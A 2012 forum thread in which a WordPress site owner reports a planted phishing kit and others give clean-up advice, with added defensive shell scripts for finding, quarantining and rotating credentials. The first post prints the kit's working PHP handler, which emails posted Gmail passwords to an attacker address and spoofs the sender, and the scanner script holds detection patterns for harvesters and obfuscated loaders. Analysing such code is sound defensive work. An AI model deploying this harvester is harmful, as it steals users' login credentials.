
Got this code injected into my site. Be aware

Discussion in 'Black Hat SEO' started by massonspy, Dec 13, 2012.

  1. massonspy

    massonspy Junior Member

    Joined:
    Apr 3, 2010
    Messages:
    130
    Likes Received:
    23
    Occupation:
    Health Pro
    Google is not as bad as it seems :) Hostgator didn't even bother.
    Sent me an email today warning I had a folder installed into /wp-includes/js/remax/
    I don't know how it got there, but G suggested cleaning the site and changing file permissions.
    I called Hostgator, will see what they think. Maybe it's a known error.

    Google also said that once you have taken all these measures, re-submit the site here
    HTML:
    http://www.google.com/safebrowsing/report_error/?tpl=emailer
    Anyone had experienced such code before?

    Here's what the code looks like, and there is one for every popular email provider.
    I have also received some weird emails coming from addresses that looked exactly the same as mine. Checked the headers; they were made to look the same.

    PHP:
    <?php
    // Credential-harvesting handler dropped into /wp-includes/js/remax/.
    // A fake Gmail login page posts into this file; it emails the captured
    // user name and password to the attacker, then redirects the victim to
    // remax.com so the login "failure" looks harmless.
    session_start();

    $ip = getenv("REMOTE_ADDR");
    $adddate = date("D M d, Y g:i a");

    $message  = "--------      UserID      ------------------------------\n";
    $message .= "UserID: ".$_POST['gmailuser']."\n";
    $message .= "Password: ".$_POST['gmailpassword']."\n";
    $message .= "======================================\n";
    $message .= "IP: ".$ip."\n";
    $message .= "Date: ".$adddate."\n";
    $message .= "--------Created By Wire Wizard------------------------------\n";

    $recipient = "jonathan1945a@gmail.com";   // attacker's drop mailbox
    $subject   = "Gmail - Created By Cheikh";

    // The From: header is taken straight from the form, which is why mail
    // sent through this kit can appear to come from the site owner's own address.
    $headers  = "From: ";
    $headers .= $_POST['eMailAdd']."\n";
    $headers .= "MIME-Version: 1.0\n";

    if (mail($recipient, $subject, $message, $headers)) {
        header("Location: http://www.remax.com/");
    }
    ?>
    Is there any way I can track where it came from?
     
  2. subster

    subster Elite Member

    Joined:
    Apr 5, 2008
    Messages:
    1,864
    Likes Received:
    1,448
    Location:
    Krauthausen
    Change all your passwords, secure your installation, remove nulled plugins and check your machine for trojans.
    Also, it seems that this is just part of a script and there are other files injected.
    Use this script to find encoded scripts on your installation and remove them. Best would be to set up WordPress from a secure source in a new folder (not only overwriting).
     
  3. themidiman

    themidiman Power Member

    Joined:
    Feb 25, 2011
    Messages:
    701
    Likes Received:
    1,536
    Location:
    root@pts/0
    Yeah, the first thing to do is to change passwords. Is this a shared account/VPS/Reseller? If you have access to the server, run maldet. HG really can't constantly scan your server for malware 24/7; the best hosts in the world don't do that. If you don't have access to the server, tell them to run a malware detection on the server, and ensure that they delete the infected files, not just chmod 000. This will make sure your resubmit with G goes well.
     
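    The workflow subster and themidiman describe (find what was added or encoded, then get the infected files out of the web root rather than chmod 000), as an added example that is not from the thread or from any of the posters. It assumes you have a shell on the hosting account and have unpacked a pristine copy of the same WordPress version beside the live site; the function names, the indicator patterns and the quarantine directory are my own choices.

```shell
#!/bin/sh
# Added example: triage helpers for a WordPress tree on shared hosting.
# Assumes a pristine copy of the SAME WordPress version sits next to the live
# site, e.g. ./clean and ./public_html (hypothetical paths).

# 1. Files the attacker added, removed or changed: compare live against clean.
#    Prints EXTRA (only in live), MISSING (only in clean) or MODIFIED, with paths
#    relative to the tree root. Paths containing spaces are not handled.
tree_diff() {
  clean=${1%/}; live=${2%/}
  diff -rq "$clean" "$live" 2>/dev/null | awk -v clean="$clean" -v live="$live" '
    /^Only in / {                      # "Only in <dir>: <name>"
      sub(/^Only in /, ""); split($0, a, ": ")
      p = a[1] "/" a[2]
      if (index(p, live) == 1) { sub("^" live "/?", "", p);  print "EXTRA " p }
      else                     { sub("^" clean "/?", "", p); print "MISSING " p }
      next
    }
    /^Files / {                        # "Files <clean-file> and <live-file> differ"
      p = $4; sub("^" live "/?", "", p); print "MODIFIED " p
    }'
}

# 2. PHP files that look like a phishing kit or an obfuscated loader, whether or
#    not they differ from clean (kits also land in uploads/ and theme folders).
suspect_php() {
  live=${1%/}
  find "$live" -type f -name '*.php' 2>/dev/null | while IFS= read -r f; do
    reason=""
    # a posted password field going straight into mail(): the kit in this thread
    if grep -qE '\$_POST\[[^]]*pass' "$f" && grep -qE '(^|[^A-Za-z0-9_])mail[[:space:]]*\(' "$f"; then
      reason=harvester
    # eval() over a decoded blob: the "encoded scripts" class
    elif grep -qE 'eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|gzuncompress|str_rot13)' "$f"; then
      reason=obfuscated
    # preg_replace() with the /e modifier, an eval in disguise on PHP 5
    elif grep -qE "preg_replace[[:space:]]*\([[:space:]]*['\"]/[^/]*/[a-z]*e[a-z]*['\"]" "$f"; then
      reason=preg_e
    fi
    if [ -n "$reason" ]; then printf '%s %s\n' "$reason" "${f#"$live"/}"; fi
  done
}

# 3. Take a flagged file off the site but keep it as evidence. chmod 000 leaves the
#    file in place on disk; moving it out of the document root removes it from the
#    site while you can still hand a copy to the host.
quarantine() {
  live=${1%/}; rel=$2; qdir=${3%/}
  mkdir -p "$qdir/$(dirname "$rel")"
  mv "$live/$rel" "$qdir/$rel"
}

# Usage (hypothetical paths):
#   tree_diff ./clean ./public_html
#   suspect_php ./public_html
#   quarantine ./public_html wp-includes/js/remax/login.php "$HOME/quarantine"
```

    Run `tree_diff` first: anything reported EXTRA under wp-includes or wp-admin should not exist in a stock install and is the first thing to look at. `suspect_php` catches kits that were dropped into writable directories such as uploads, which a tree comparison against core alone will not show.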
  4. aftershock2020

    aftershock2020 Senior Member

    Joined:
    Oct 19, 2007
    Messages:
    981
    Likes Received:
    477
    Totally agree with you on that. Looks that way to me as well.

    @massonspy - take this advice, bud. Something seriously funky is going on there, and it will risk taking down the entire server if you aren't careful, as you are obviously on a shared device if you are using Hostgator hosting.

    That's all they use, short of their blade vps systems, which suck just as badly as the shared servers.
     
  5. Scritty

    Scritty Elite Member Premium Member

    Joined:
    May 1, 2010
    Messages:
    2,807
    Likes Received:
    4,496
    Occupation:
    Affiliate Marketer
    Location:
    UK
    Home Page:
    Hostgator offers a full secure backup in a .tar file.
    If you've subscribed to that, I would completely delete your site, MySQL database and all, and do a 100% backup with new passwords.
    Also the WP keys (remember them).
    Passwords on WordPress: I tend to use 48 characters, upper case, lower case, numbers and specials (and the user name is NEVER admin; that's half the job done for the hacker).

    If you've got a backup service then your site can be clean and running again inside 45 minutes.
    Without it .......

    Scritty
     
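    Scritty's two credential points, resetting the WP keys and using a long mixed password, as an added example that is not from the thread or from WordPress itself. It rewrites the eight `define()` lines in wp-config.php with fresh random values (which invalidates every existing login cookie, including one an intruder may hold) and generates a 48-character password. The function names and the character sets are my own; the wp-config.php path is an argument.

```shell
#!/bin/sh
# Added example: rotate WordPress auth keys/salts and mint a long random password
# after a clean-up. Uses only tr, head, sed and /dev/urandom so it runs on a
# shared-hosting shell without openssl. Hypothetical helper names throughout.

# The eight constants WordPress reads from wp-config.php for cookie signing.
WP_KEYS="AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT"

# $1 = tr character set, $2 = length. Draws from kernel randomness.
rand_chars() {
  LC_ALL=C tr -dc "$1" < /dev/urandom | head -c "$2"
}

# 64 alphanumeric characters (~381 bits): safe inside a single-quoted PHP string.
rand_salt() { rand_chars 'A-Za-z0-9' 64; }

# Upper, lower, digits and specials; quotes and backslash are left out so the
# value pastes cleanly into a password manager or a shell command.
rand_password() { rand_chars 'A-Za-z0-9!@#%^&*()_+=-' "${1:-48}"; }

# Replace every define('KEY', '...'); line in the given wp-config.php with a new
# value. '|' is the sed delimiter so the PHP text never collides with it.
rotate_salts() {
  cfg=$1
  for k in $WP_KEYS; do
    s=$(rand_salt)
    sed -i.bak "s|define( *'$k', *'[^']*' *);|define('$k', '$s');|" "$cfg"
  done
  rm -f "$cfg.bak"
}

# Read the current value of one constant back (used to verify the rotation).
salt_value() {
  sed -n "s|.*define( *'$1', *'\([^']*\)'.*|\1|p" "$2"
}

# Usage (hypothetical path):
#   cp wp-config.php wp-config.php.pre-rotation && rotate_salts wp-config.php
#   rand_password 48; echo
```

    Rotating the salts logs every user out, which is the point: a cookie the attacker captured before the clean-up is no longer valid afterwards. Do it after the password changes, not before, so the intruder cannot simply log back in with the old credentials and obtain a fresh cookie.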
  6. massonspy

    massonspy Junior Member

    Joined:
    Apr 3, 2010
    Messages:
    130
    Likes Received:
    23
    Occupation:
    Health Pro
    Sorry for the late reply. HG ran an antivirus and said they cleaned it all.
    I just changed the passwords for the host and WP; it seems fine now.

    This is hosted on a reseller account I own. I guess it's considered shared too.